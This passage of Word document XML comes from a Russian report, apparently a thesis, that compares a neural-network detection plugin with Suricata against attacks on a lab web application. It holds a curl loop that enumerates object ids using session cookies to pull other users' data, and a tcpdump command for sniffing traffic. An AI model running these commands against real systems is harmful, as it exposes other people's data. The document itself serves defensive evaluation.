          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>0</w:t>
      </w:r>
      <w:r w:rsidRPr="00D70BA9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> – Обнаружение несанкционированного доступа</w:t>
      </w:r>
      <w:r w:rsidRPr="005F01A1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77DF64D8" w14:textId="77777777" w:rsidR="008E0171" w:rsidRDefault="008E0171" w:rsidP="008E0171">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="5490"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="502CBAFD"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C43929">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Нейросетевой плагин обнаружил 24 аномальных потока с адреса атакующего. Классическая </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C43929">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Suricata</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C43929">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> не сформировала ни одного срабатывания</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="549A2C0B" w14:textId="39988E1E" w:rsidR="00FA5930" w:rsidRDefault="00FA5930" w:rsidP="006037FD">
      <w:pPr>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1898B16B" w14:textId="6FEB980F" w:rsidR="008E0171" w:rsidRPr="00D70BA9" w:rsidRDefault="000A1CD6" w:rsidP="008E0171">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="4155"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000A1CD6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">3.4.5.3 </w:t>
      </w:r>
      <w:r w:rsidR="008E0171" w:rsidRPr="000A1CD6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Сценарий</w:t>
      </w:r>
      <w:r w:rsidR="008E0171" w:rsidRPr="00C43929">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> 3 — Перебор идентификаторов объектов</w:t>
      </w:r>
      <w:r w:rsidR="008E0171">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="008E0171" w:rsidRPr="00C43929">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">В данном сценарии атакующий последовательно перебирал значения параметра </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="008E0171" w:rsidRPr="00C43929">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>id</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="008E0171" w:rsidRPr="00C43929">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> в URL веб-приложения с целью получения данных других пользователе</w:t>
      </w:r>
      <w:r w:rsidR="008E0171" w:rsidRPr="00D70BA9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>й:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CE61854" w14:textId="77777777" w:rsidR="00D70BA9" w:rsidRPr="00D70BA9" w:rsidRDefault="00D70BA9" w:rsidP="00D70BA9">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="4155"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="34DB260C" w14:textId="77777777" w:rsidR="008E0171" w:rsidRPr="00ED4CBB" w:rsidRDefault="008E0171" w:rsidP="00D70BA9">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="4155"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D70BA9">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>For i in {</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00D70BA9">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>1..</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00D70BA9">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>10}; do curl- b cookies.txt "http://192.168.0.104/vulnerabilities/weak_id/?id=$i"; done</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E0DE595" w14:textId="77777777" w:rsidR="00D70BA9" w:rsidRPr="00ED4CBB" w:rsidRDefault="00D70BA9" w:rsidP="00D70BA9">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="4155"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="564F5B79" w14:textId="628B9919" w:rsidR="008E0171" w:rsidRPr="005F01A1" w:rsidRDefault="00D70BA9" w:rsidP="009534A2">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="4155"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D70BA9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">В результате выполнения команды атакующий последовательно обратился к десяти различным идентификаторам объектов, генерируя серию HTTP-запросов к уязвимому параметру. Несмотря на </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00D70BA9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>то</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00D70BA9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> что каждый отдельный запрос являлся легитимным с точки зрения протокола HTTP, высокая частота однотипных обращений с одного адреса сформировала аномальный паттерн трафика.</w:t>
      </w:r>
      <w:r w:rsidR="009534A2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="008E0171" w:rsidRPr="00D70BA9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Процесс</w:t>
      </w:r>
      <w:r w:rsidR="008E0171" w:rsidRPr="005F01A1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> обнаружения показан на рисунке </w:t>
      </w:r>
      <w:r w:rsidR="004961D0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidR="008E0171" w:rsidRPr="005F01A1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D7504E1" w14:textId="77777777" w:rsidR="008E0171" w:rsidRPr="005F01A1" w:rsidRDefault="008E0171" w:rsidP="008E0171">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="4155"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4D48EFFF" w14:textId="77777777" w:rsidR="008E0171" w:rsidRPr="00D70BA9" w:rsidRDefault="008E0171" w:rsidP="00D70BA9">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="4155"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D70BA9">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2FDCE031" wp14:editId="47919742">
            <wp:extent cx="5690235" cy="2752725"/>
            <wp:effectExtent l="0" t="0" r="5715" b="9525"/>
            <wp:docPr id="769109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09177" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId51"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5690235" cy="2752725"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="022BF5B0" w14:textId="11DBFD8C" w:rsidR="008E0171" w:rsidRDefault="008E0171" w:rsidP="00D70BA9">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="5490"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D70BA9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Рисунок </w:t>
      </w:r>
      <w:r w:rsidR="004961D0" w:rsidRPr="00D70BA9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r w:rsidR="00D70BA9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidR="004961D0" w:rsidRPr="00D70BA9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00D70BA9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>– Обнаружение перебора идентификаторов объектов</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B7D1190" w14:textId="77777777" w:rsidR="008E0171" w:rsidRDefault="008E0171" w:rsidP="008E0171">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="5490"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3817BD19"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5F01A1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Нейросетевой плагин зафиксировал 4 аномальных потока с адреса атакующего. Классическая </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005F01A1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Suricata</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005F01A1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> не сформировала срабатываний по той же причине — атака реализуется на уровне приложения и неотличима от обычного веб-трафика по метаданным потоков.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005F01A1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Итого:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005F01A1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Suricata</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005F01A1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> — 0 срабатываний, нейросетевой плагин — 33 срабатывания</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01BE3556" w14:textId="77777777" w:rsidR="008E0171" w:rsidRPr="000A1CD6" w:rsidRDefault="008E0171" w:rsidP="008E0171">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="4155"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7910E221" w14:textId="48275AF2" w:rsidR="008E0171" w:rsidRPr="000A1CD6" w:rsidRDefault="000A1CD6"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3.4.6 </w:t>
      </w:r>
      <w:r w:rsidR="008E0171" w:rsidRPr="000A1CD6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Тест 6. Криптографические сбои </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17C00D8B"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E32C6A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Данная категория охватывает уязвимости, связанные с некорректной защитой, шифрованием или хранением конфиденциальных данных, что приводит к их утечке или перехвату. Целью теста являлась проверка защищённости передаваемых данных от перехвата с использованием инструмента </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E32C6A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>tcpdump</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E32C6A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4449B211" w14:textId="77777777" w:rsidR="00D70BA9" w:rsidRDefault="00D70BA9" w:rsidP="008E0171">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="4155"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3DD45A26" w14:textId="67C67A2B" w:rsidR="008E0171" w:rsidRDefault="008E0171" w:rsidP="00D70BA9">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="4155"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E32C6A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">С атакующей машины </w:t>
      </w:r>
      <w:r w:rsidRPr="00E32C6A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Kali</w:t>
      </w:r>
      <w:r w:rsidRPr="00E32C6A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00E32C6A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Linux</w:t>
      </w:r>
      <w:r w:rsidRPr="00E32C6A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> был запущен перехват трафика:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AEED7A7" w14:textId="77777777" w:rsidR="004C410D" w:rsidRPr="00E32C6A" w:rsidRDefault="004C410D" w:rsidP="00D70BA9">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="4155"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="169336AE" w14:textId="77777777" w:rsidR="008E0171" w:rsidRPr="005A1278" w:rsidRDefault="008E0171" w:rsidP="00D70BA9">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="4155"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005F01A1">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>sudo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005F01A1">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005F01A1">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>tcpdump</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005F01A1">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005F01A1">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>i</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005F01A1">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> eth1 host 192.168.0.104 -A -w </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005F01A1">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>capture.pcap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
